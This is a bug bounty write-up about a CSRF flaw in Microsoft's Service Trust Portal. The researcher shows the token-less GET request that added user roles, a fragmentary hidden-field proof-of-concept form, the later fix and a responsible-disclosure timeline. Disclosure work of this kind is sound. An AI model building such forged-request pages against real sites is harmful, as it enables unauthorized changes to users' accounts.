Microsoft - CSRF Bug - Add Users in their Cloud Service Trust Portal

In this blog post I will show you one of the easy CSRF Bug which I Found on Microsoft Platform, not only that, I will reiterate why it is important to keep trying.

If you are my follower @Twitter then you must be knowing I sometimes sorry regularly tweet about NeverGiveUp sort of tweets the best reason I can tell you by giving example of my experience with Microsoft Bug bounty Program.

Talking about Microsoft bug bounty first point they only accept submission which is high impact. Big `NO` to low hanging fruits and big `NO` if you can not exploit the bug. I reported 10+ bug reports to Microsoft security team this includes some low hanging fruits and some bugs which I was not able to exploit. All marked as NA.  Well its but obvious after all this failure when my mind tells me to give up on this, I tell myself.

So After spending hours,days and months I finally got the HIT call SUCCESS.
(Keep Trying #NeverGiveUp)

Lets move towards POC.


I was testing one of Microsoft domain - Service Trust Portal (STP).
During the testing, I came across below feature in their portal where you can add Portal users and Portal admin.

The Add User feature caught my attention, generally speaking while checking out the application I always try to correlate application work flow with respect to different attack vector which I can execute (Some tips to try in a wild ...XD) , so that time straight away I though about CSRF.


HTTP Request:-

GET /onboarding/AddUserRole/1110?role=User HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cookie: [Some_value]
Connection: keep-alive

From above HTTP Request we conclude that there is no CSRF token present.
This way by using this loophole I was able to Add User roles on behalf of admin user.


    <form action="">
      <input type="hidden" name="role" value="User" />
      <input type="submit" value="Submit request" />

So I was able to add any user in their Cloud Service Trust Portal by using CSRF Attack.

How they fix it:- 

POST /onboarding/AddUserRole HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 29
Cookie: [Some_value]
Connection: keep-alive


They listed me in their Hall Of Fame and Rewarded me with the bounty.

Moral Of The Story:- 
Stay focused, Don't Quit, keep trying #BelieveThat


Vulnerability timeline:

Feb 14, 2016   : Reported to Microsoft Security Response Center.
Feb 20, 2016  :   Received initial reply from Microsoft  Team. Report Triaged
Feb 25, 2016  :   Microsoft Security Team successfully reproduced the bug.
Mar 16, 2016  :  Microsoft Security Team  Fixed the reported bug.
Apr 01, 2016  :  Bounty Awarded of $500 by Microsoft
June 19, 2016 :  Public responsible disclosure

Share this

Related Posts

Next Post »


Write comments